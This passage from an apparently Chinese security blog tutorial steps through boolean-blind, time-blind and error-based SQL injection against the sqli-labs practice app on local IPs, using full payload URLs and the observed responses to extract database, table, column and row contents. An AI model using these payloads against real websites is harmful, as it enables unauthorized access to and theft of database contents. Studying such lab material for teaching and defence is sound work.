<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and ascii(substr((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;emails&apos; limit 0,1),1,1))&gt; 104--+</span><br></pre></td></tr></table></figure>
<p>由前序步骤可知，当前数据库的库名为”security”、第一个表名为”emails”,判断当前表中第一个字段中第一个字母为。</p>
<p>当带入值为104时，当前页面数据正常回显，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv27xf3j327y0q8ng6.png" alt="image-20200115142510718"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and ascii(substr((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;emails&apos; limit 0,1),1,1))&gt; 105--+</span><br></pre></td></tr></table></figure>
<p>当带入值为105时，当前页面数据回显为空，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115145329352.png" alt="image-20200115145329352"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前字段名第一位的ascii值为105，对应字符为i</p>
<p>以此类推判断当前字段名的后续字符值，获取当前表中的第一个字段名称。</p>
<h3 id="3-2-5-猜解字段内容"><a href="#3-2-5-猜解字段内容" class="headerlink" title="3.2.5 猜解字段内容"></a>3.2.5 猜解字段内容</h3><p><strong>第一步:拆解字段内容数量</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1' and (<span class="keyword">select</span> <span class="keyword">count</span>(<span class="keyword">id</span>) <span class="keyword">from</span> emails) &gt; <span class="number">7</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>获取emails表中，id字段的内容数量</p>
<p>当带入值为7时，页面数据正常回显，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115152625643.png" alt="image-20200115152625643"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1' and (<span class="keyword">select</span> <span class="keyword">count</span>(<span class="keyword">id</span>) <span class="keyword">from</span> emails) &gt; <span class="number">8</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>当带入值为8时，页面数据回显结果为空，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115152729849.png" alt="image-20200115152729849"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前字段内容数量8</p>
<p><strong>第二步:拆解字段内容长度</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and length((select id from emails limit 0,1))&gt;0--+</span><br></pre></td></tr></table></figure>
<p>获取id字段中，第一个字段内容的长度</p>
<p>当带入值为0时，页面数据正常回显，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfvb5wchj327y0oenfn.png" alt="image-20200115154939801"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and length((select id from emails limit 0,1))&gt;1--+</span><br></pre></td></tr></table></figure>
<p>当带入值为1时，页面数据回显结果为空，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115155032310.png" alt="image-20200115155032310"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前字段长度值1。</p>
<p>按照此步骤可以一次判断其他字段的长度。</p>
<p><strong>第三步:拆解字段内容</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and ascii(substr((select id from emails limit 0,1),1,1)) &gt;48--+</span><br></pre></td></tr></table></figure>
<p>获取字段中第一位的字段内容的ascii码值</p>
<p>当带入值为48时，页面数据正常回显，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115154205101.png" alt="image-20200115154205101"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and ascii(substr((select id from emails limit 0,1),1,1)) &gt;49--+</span><br></pre></td></tr></table></figure>
<p>当带入值为49时，页面数据回显为空，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115154245368.png" alt="image-20200115154245368"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前id字段第一个内容第一位ascii码值为49，即为数字1</p>
<p>后续字段内容按此步骤继续判断即可。</p>
<p>若要获取库中其他信息，按以上步骤，修改payload中的值即可获取特性的内容。</p>
<h2 id="3-3-时间盲注"><a href="#3-3-时间盲注" class="headerlink" title="3.3 时间盲注"></a>3.3 时间盲注</h2><h3 id="3-3-1-常用函数详解"><a href="#3-3-1-常用函数详解" class="headerlink" title="3.3.1 常用函数详解"></a>3.3.1 常用函数详解</h3><p><strong>if()函数</strong></p>
<p><strong>格式：</strong>if(expr1,expr2,expr3)</p>
<p><strong>定义：</strong>判断函数，如果expr1是TRUE(expr1&lt;&gt; 0 and expr1 &lt;&gt; null,”&lt;&gt;”是不等于的意思)，则if()返回值是expr2；否则返回值为expr3。返回值类型为数字或者字符串，具体情况需要视所在语境而定。</p>
<p><strong>使用细节:</strong></p>
<p><code>select * from users;</code></p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115161737187.png" alt="image-20200115161737187"></p>
<p><code>select if(id &gt; 7, &#39;exist&#39;, &#39;null&#39;) from users</code></p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfvcfg3qj31u20okjub.png" alt="image-20200115162009405"></p>
<h3 id="3-3-2-拆解库名"><a href="#3-3-2-拆解库名" class="headerlink" title="3.3.2 拆解库名"></a>3.3.2 拆解库名</h3><p><strong>第一步：猜解库名长度</strong></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1' and if(length(database())&gt;7,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入值为7时，页面响应时间增长，响应时间为3s,如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200120161504245.png" alt="image-20200120161504245"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if(length(database())&gt;8,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入值为8时，页面响应时间不变，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200120161602087.png" alt="image-20200120161602087"></p>
<p>由此可判断当前数据库库名长度为8</p>
<p><strong>第二步：猜解库名</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if(ascii(substr(database(),1,1))&gt;114,sleep(3),1)- -+</span><br></pre></td></tr></table></figure>
<p>当带入的值为114时，页面响应时间为3s，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfuy1ghsj327y0hstcn.png" alt="image-20200120162420404"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if(ascii(substr(database(),1,1))&gt;115,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入的值为115时，页面响应时间正常 ，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv9cdbej31t10u0tte.png" alt="image-20200120162535680"></p>
<p>由此可判断库名的第一个字母的ascii值为115，即s</p>
<p>重复以上方法依次判断库名后续字母的ascii值，获取后续字母</p>
<p>最终得到库名为security</p>
<h3 id="3-3-3-猜解表名"><a href="#3-3-3-猜解表名" class="headerlink" title="3.3.3 猜解表名"></a>3.3.3 猜解表名</h3><p><strong>第一步：猜解表名数量</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if((select count(table_name) from information_schema.tables where table_schema=&apos;security&apos;)&gt;3,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入的值为3时，页面响应时间为3s，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfuz238wj31su0u0aun.png" alt="image-20200120164400523"></p>
<p>当带入的值为4时，页面响应时间正常 ，如下图所示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if((select count(table_name) from information_schema.tables where table_schema=&apos;security&apos;)&gt;4,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p><img src="/2020/03/09/高级注入（二）/image-20200120164446906.png" alt="image-20200120164446906"></p>
<p>由此可判断，当前库中表的数量为4</p>
<p><strong>第二步：猜解表的长度</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if(length((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1))&gt;5,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入的值为5时，页面响应时间为3s，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200120164914497.png" alt="image-20200120164914497"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if(length((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1))&gt;6,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入的值为6时，页面响应时间正常，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200120165029898.png" alt="image-20200120165029898"></p>
<p>由此可判断，当前库中第一个表的表名长度为6</p>
<p><strong>第三步：猜解表名</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.102:8080/Less-9/?id=1&apos; and if(ascii(substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,1))&gt;100,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入的值为100时，页面响应时间为3s，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfuzy9p1j31sj0u0qnj.png" alt="image-20200120170443238"></p>
<p>当带入的值为101时，页面响应时间正常，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv4neo0j31ro0u0kc1.png" alt="image-20200120170631561"></p>
<p>由此可判断，第一个表名的第一个字母ascii值为101，即为e</p>
<p>重复以上方法一次判断后续字母和后续表名</p>
<p>库中的四个表名依次为：emails、referers、uagents、users</p>
<h3 id="3-3-4-猜解字段名"><a href="#3-3-4-猜解字段名" class="headerlink" title="3.3.4 猜解字段名"></a>3.3.4 猜解字段名</h3><p><strong>第一步：猜解users表中字段数量</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.104:8080/Less-9/?id=1&apos; and if((select COUNT(column_name) from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos;)&gt;2,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>带入值为2时，页面响应时间为3s，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200121111207067.png" alt="image-20200121111207067"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.104:8080/Less-9/?id=1&apos; and if((select COUNT(column_name) from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos;)&gt;3,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>带入值为3时，页面响应时间正常，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200121111422842.png" alt="image-20200121111422842"></p>
<p>由此可判断，users表中有3个字段</p>
<p><strong>第二步：判断字段名称长度</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.104:8080/Less-9/?id=1&apos; and if(length((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos; limit 0,1))&gt;1,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入值为1时,页面响应时间为3s，如下图所示:</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200121111905166.png" alt="image-20200121111905166"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.104:8080/Less-9/?id=1&apos; and if(length((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos; limit 0,1))&gt;2,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>但带入的值为2时，页面的响应时间正常，如下图所示：</p>
<p><img src="https://tva1.sinaimg.cn/large/00831rSTgy1gcnfv0w9fdj31u00u0avt.jpg" alt="image-20200121112024864"></p>
<p>由此可判断，当前字段名长度为2</p>
<p><strong>第三步：判断字段名</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.100:8080/Less-9/?id=1&apos; and if(ascii(substr((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos; limit 0,1),1,1))&gt;104,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入的值为104时，页面的响应时间为3s，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv58gu9j31rv0u0nji.png" alt="image-20200121140259834"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.100:8080/Less-9/?id=1&apos; and if(ascii(substr((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos; limit 0,1),1,1))&gt;105,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入的值为105时，页面的响应时间正常，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv6jkfoj31vu0u01fn.png" alt="image-20200121140628583"></p>
<p>由此可判断，当前字段的第一个字母的ascii值为105，即为i</p>
<p>以此方法循环判断当前表中的字段名称依次为：id、email_id</p>
<h3 id="3-3-5-猜解字段内容"><a href="#3-3-5-猜解字段内容" class="headerlink" title="3.3.5 猜解字段内容"></a>3.3.5 猜解字段内容</h3><p><strong>第一步:拆解字段内容数量</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-9/?id=1' and if((<span class="keyword">select</span> <span class="keyword">count</span>(<span class="keyword">id</span>) <span class="keyword">from</span> emails) &gt; <span class="number">7</span>,<span class="keyword">sleep</span>(<span class="number">3</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>获取emails表中，id字段的内容数量</p>
<p>当带入值为7时，页面回显时间明显变长，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200210134818728.png" alt="image-20200210134818728"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-9/?id=1' and if((<span class="keyword">select</span> <span class="keyword">count</span>(<span class="keyword">id</span>) <span class="keyword">from</span> emails) &gt; <span class="number">8</span>,<span class="keyword">sleep</span>(<span class="number">3</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>当带入值为8时，页面数据回显时间正常，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200210135002727.png" alt="image-20200210135002727"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前字段内容数量8</p>
<p><strong>第二步:拆解字段内容长度</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-9/?id=1&apos; and if(length((select id from emails limit 0,1))&gt;0,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>获取id字段中，第一个字段内容的长度</p>
<p>当带入值为0时，页面回显时间明显变长，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv71m85j31u20u01e7.png" alt="image-20200210135249285"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-9/?id=1&apos; and if(length((select id from emails limit 0,1))&gt;1,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入值为1时，页面回显时间正常，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200210135402577.png" alt="image-20200210135402577"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前字段长度值1。</p>
<p>按照此步骤可以一次判断其他字段的长度。</p>
<p><strong>第三步:拆解字段内容</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-9/?id=1&apos; and if(ascii(substr((select id from emails limit 0,1),1,1)) &gt;48,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>获取字段中第一位的字段内容的ascii码值</p>
<p>当带入值为48时，页面回显时间明显增长，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200210135530847.png" alt="image-20200210135530847"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-9/?id=1&apos; and if(ascii(substr((select id from emails limit 0,1),1,1)) &gt;49,sleep(3),1)--+</span><br></pre></td></tr></table></figure>
<p>当带入值为49时，页面回显时间正常，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200210135815529.png" alt="image-20200210135815529"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前id字段第一个内容第一位ascii码值为49，即为数字1</p>
<p>后续字段内容按此步骤继续判断即可。</p>
<p>若要获取库中其他信息，按以上步骤，修改payload中的值即可获取特性的内容。</p>
<h2 id="3-4-报错盲注"><a href="#3-4-报错盲注" class="headerlink" title="3.4 报错盲注"></a>3.4 报错盲注</h2><h3 id="3-4-1-常用函数详解"><a href="#3-4-1-常用函数详解" class="headerlink" title="3.4.1 常用函数详解"></a>3.4.1 常用函数详解</h3><p>​    见 2.3.2中有详解。</p>
<h3 id="3-4-2-获取数据版本信息和库名"><a href="#3-4-2-获取数据版本信息和库名" class="headerlink" title="3.4.2 获取数据版本信息和库名"></a>3.4.2 获取数据版本信息和库名</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-5/?id=1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="number">0x26</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> x;<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv184n7j327y0qyh5e.png" alt="image-20200211152548752"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-5/?id=1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">database</span>(),<span class="number">0x26</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> x;<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2020/03/09/高级注入（二）/image-20200211152812564.png" alt="image-20200211152812564"></p>
<h3 id="3-4-3-获取数据库的表名"><a href="#3-4-3-获取数据库的表名" class="headerlink" title="3.4.3 获取数据库的表名"></a>3.4.3 获取数据库的表名</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-5/?id=1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">count</span>(*),<span class="keyword">concat</span>((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x26</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> x;<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2020/03/09/高级注入（二）/image-20200211154642052.png" alt="image-20200211154642052"></p>
<p>修改对应limit的第一个参数可以获取其他表名。</p>
<h3 id="3-4-4-获取表中的字段名"><a href="#3-4-4-获取表中的字段名" class="headerlink" title="3.4.4 获取表中的字段名"></a>3.4.4 获取表中的字段名</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shttp://192.168.2.220:8080/Less-5/?id=1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">count</span>(*),<span class="keyword">concat</span>((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">and</span> table_name=<span class="string">'emails'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x26</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> x;<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv7v5d3j327y0oingx.png" alt="image-20200211155003474"></p>
<h3 id="3-4-5-获取字段中的内容"><a href="#3-4-5-获取字段中的内容" class="headerlink" title="3.4.5 获取字段中的内容"></a>3.4.5 获取字段中的内容</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.220:8080/Less-5/?id=1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">count</span>(*),<span class="keyword">concat</span>((<span class="keyword">select</span> <span class="keyword">id</span>  <span class="keyword">from</span> emails <span class="keyword">limit</span> <span class="number">3</span>,<span class="number">1</span>),<span class="number">0x26</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> x;<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfva9c4pj327y0pu4ib.png" alt="image-20200211155609267"></p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://Greetdawn.github.io/2020/03/09/高级注入（二）.html" title="高级注入（二）" target="_blank" rel="external">https://Greetdawn.github.io/2020/03/09/高级注入（二）.html</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/cofess" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/cofess" target="_blank"><span class="text-dark">昵称</span><small class="ml-1x">Web Developer &amp; Designer</small></a></h3>
        <div>个人简介。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2020/03/09/高级注入（三）.html" title="高级注入（三）"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2020/03/08/高级注入（一）.html" title="高级注入（一）"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>赏</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>感谢您的支持，我会继续努力的!</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/alipayimg.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开支付宝扫一扫，即可进行扫码打赏哦</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/wechatpayimg.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开微信扫一扫，即可进行扫码打赏哦</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> 支付宝</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> 微信支付</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/cofess" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="http://weibo.com/cofess" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/iwebued" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/cofess" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>
<script src="/js/plugin.min.js"></script>
<script src="/js/application.js"></script>

    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>
<script src="/js/insight.js"></script>





   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
